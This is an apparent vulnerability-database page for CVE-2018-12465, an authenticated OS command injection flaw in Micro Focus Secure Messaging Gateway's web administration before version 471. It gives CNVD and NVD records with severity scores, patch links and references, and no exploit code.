  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

CNVD-2018-12539

Vulnerability from cnvd - Published: 2018-07-04

Title

Micro Focus Secure Messaging Gateway Web administration组件操作系统命令注入漏洞

Description

Micro Focus Secure Messaging Gateway（SMG）是英国Micro Focus公司的一套企业网络和消息系统出、入站保护软件。该产品包括病毒防护、反垃圾邮件、防DDos攻击和图像分析等功能。Web administration是其中的一个基于Web的管理组件。 Micro Focus SMG 471之前版本中的Web administration组件存在操作系统命令注入漏洞。远程攻击者可利用该漏洞在SMG服务器上执行任意的操作系统命令。

Severity

高

Patch Name

Micro Focus Secure Messaging Gateway Web administration组件操作系统命令注入漏洞的补丁

Patch Description

Formal description

目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://support.microfocus.com/kb/doc.php?id=7023133

Reference

https://support.microfocus.com/kb/doc.php?id=7023133

Impacted products

Name
Micro Focus Secure Messaging Gateway <471

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2018-12465"
    }
  },
  "description": "Micro Focus Secure Messaging Gateway\uff08SMG\uff09\u662f\u82f1\u56fdMicro Focus\u516c\u53f8\u7684\u4e00\u5957\u4f01\u4e1a\u7f51\u7edc\u548c\u6d88\u606f\u7cfb\u7edf\u51fa\u3001\u5165\u7ad9\u4fdd\u62a4\u8f6f\u4ef6\u3002\u8be5\u4ea7\u54c1\u5305\u62ec\u75c5\u6bd2\u9632\u62a4\u3001\u53cd\u5783\u573e\u90ae\u4ef6\u3001\u9632DDos\u653b\u51fb\u548c\u56fe\u50cf\u5206\u6790\u7b49\u529f\u80fd\u3002Web administration\u662f\u5176\u4e2d\u7684\u4e00\u4e2a\u57fa\u4e8eWeb\u7684\u7ba1\u7406\u7ec4\u4ef6\u3002\r\n\r\nMicro Focus SMG 471\u4e4b\u524d\u7248\u672c\u4e2d\u7684Web administration\u7ec4\u4ef6\u5b58\u5728\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u5728SMG\u670d\u52a1\u5668\u4e0a\u6267\u884c\u4efb\u610f\u7684\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4\u3002",
  "discovererName": "unknown",
  "formalWay": "\u76ee\u524d\u5382\u5546\u5df2\u53d1\u5e03\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8865\u4e01\u83b7\u53d6\u94fe\u63a5\uff1a\r\nhttps://support.microfocus.com/kb/doc.php?id=7023133",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2018-12539",
  "openTime": "2018-07-04",
  "patchDescription": "Micro Focus Secure Messaging Gateway\uff08SMG\uff09\u662f\u82f1\u56fdMicro Focus\u516c\u53f8\u7684\u4e00\u5957\u4f01\u4e1a\u7f51\u7edc\u548c\u6d88\u606f\u7cfb\u7edf\u51fa\u3001\u5165\u7ad9\u4fdd\u62a4\u8f6f\u4ef6\u3002\u8be5\u4ea7\u54c1\u5305\u62ec\u75c5\u6bd2\u9632\u62a4\u3001\u53cd\u5783\u573e\u90ae\u4ef6\u3001\u9632DDos\u653b\u51fb\u548c\u56fe\u50cf\u5206\u6790\u7b49\u529f\u80fd\u3002Web administration\u662f\u5176\u4e2d\u7684\u4e00\u4e2a\u57fa\u4e8eWeb\u7684\u7ba1\u7406\u7ec4\u4ef6\u3002\r\n\r\nMicro Focus SMG 471\u4e4b\u524d\u7248\u672c\u4e2d\u7684Web administration\u7ec4\u4ef6\u5b58\u5728\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\u3002\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u5728SMG\u670d\u52a1\u5668\u4e0a\u6267\u884c\u4efb\u610f\u7684\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4\u3002 \u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
  "patchName": "Micro Focus Secure Messaging Gateway Web administration\u7ec4\u4ef6\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\u7684\u8865\u4e01",
  "products": {
    "product": "Micro Focus Secure Messaging Gateway \u003c471"
  },
  "referenceLink": "https://support.microfocus.com/kb/doc.php?id=7023133",
  "serverity": "\u9ad8",
  "submitTime": "2018-07-02",
  "title": "Micro Focus Secure Messaging Gateway Web administration\u7ec4\u4ef6\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e"
}

FKIE_CVE-2018-12465

Vulnerability from fkie_nvd - Published: 2018-06-29 16:29 - Updated: 2024-11-21 03:45

Severity ?

9.1 (Critical) - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
7.2 (High) - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security@opentext.com	https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/
	security@opentext.com	https://support.microfocus.com/kb/doc.php?id=7023133
	security@opentext.com	https://www.exploit-db.com/exploits/45083/
	af854a3a-2127-422b-91ae-364da2661108	https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/
	af854a3a-2127-422b-91ae-364da2661108	https://support.microfocus.com/kb/doc.php?id=7023133
	af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/45083/

Impacted products

	Vendor	Product	Version
	microfocus	secure_messaging_gateway	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:microfocus:secure_messaging_gateway:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "7549F67C-4E9D-4801-B4CE-E006F25CE090",
              "versionEndExcluding": "471",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An OS command injection vulnerability in the web administration component of Micro Focus Secure Messaging Gateway (SMG) allows a remote attacker authenticated as a privileged user to execute arbitrary OS commands on the SMG server. This can be exploited in conjunction with CVE-2018-12464 to achieve unauthenticated remote code execution. Affects Micro Focus Secure Messaging Gateway versions prior to 471. It does not affect previous versions of the product that used GWAVA product name (i.e. GWAVA 6.5)."
    },
    {
      "lang": "es",
      "value": "Una vulnerabilidad de inyecci\u00f3n de comandos arbitrarios del sistema operativo en el componente de administraci\u00f3n web de Micro Focus Secure Messaging Gateway (SMG) permite que un atacante remoto autenticado como usuario privilegiado ejecute comandos arbitrarios del sistema operativo en el servidor SMG. Esto se puede explotar junto con CVE-2018-12464 para conseguir ejecutar c\u00f3digo de manera remota. Esto afecta a las versiones anteriores a la 471 de Micro Focus Secure Messaging Gateway. No afecta a las versiones anteriores del producto que utilicen el nombre de producto GWAVA (por ejemplo, GWAVA 6.5.)."
    }
  ],
  "id": "CVE-2018-12465",
  "lastModified": "2024-11-21T03:45:16.237",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "SINGLE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 9.0,
          "confidentialityImpact": "COMPLETE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 8.0,
        "impactScore": 10.0,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.1,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 6.0,
        "source": "security@opentext.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2018-06-29T16:29:00.337",
  "references": [
    {
      "source": "security@opentext.com",
      "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
    },
    {
      "source": "security@opentext.com",
      "url": "https://support.microfocus.com/kb/doc.php?id=7023133"
    },
    {
      "source": "security@opentext.com",
      "url": "https://www.exploit-db.com/exploits/45083/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://pentest.blog/unexpected-journey-6-all-ways-lead-to-rome-remote-code-execution-on-microfocus-secure-messaging-gateway/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://support.microfocus.com/kb/doc.php?id=7023133"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://www.exploit-db.com/exploits/45083/"
    }
  ],
  "sourceIdentifier": "security@opentext.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-77"
        }
      ],
      "source": "security@opentext.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2018-12465 (GCVE-0-2018-12465)

GSD-2018-12465

VAR-201806-1216

This module requires Metasploit: https://metasploit.com/download

Current source: https://github.com/rapid7/metasploit-framework

GHSA-CH8C-P3PW-FG7F

CNVD-2018-12539

FKIE_CVE-2018-12465

Tags

Sightings

Nomenclature